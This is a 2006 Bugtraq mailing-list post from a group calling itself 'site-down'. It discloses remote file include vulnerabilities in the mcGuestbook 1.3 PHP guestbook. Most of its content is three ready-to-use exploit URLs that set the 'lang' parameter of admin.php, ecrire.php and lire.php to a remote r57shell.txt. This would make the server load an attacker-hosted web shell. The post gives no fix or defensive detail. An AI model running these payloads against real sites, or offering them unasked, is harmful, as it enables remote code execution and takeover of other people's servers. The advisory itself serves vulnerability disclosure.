
Date: 13 Jun 2006 14:05:51 -0000
From: gamr-14@...mail.com
To: bugtraq@...urityfocus.com
Subject: file include exploits in mcGuestbook 1.3


Multiple file include exploits in mcGuestbook 1.3 

script type : mcGuestbook 1.3  
bug found by : sweet-devil
team : site-down
type : file include 

####################################################
exploits :


admin.php

http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?

ecrire.php

http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt?

lire.php

http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt?

####################################################


#######################
emails: 

gamr-14@...mail.com  &  black-cod3@...mail.com
#######################


All my respect to our friends , lezr.com 


done .. peace


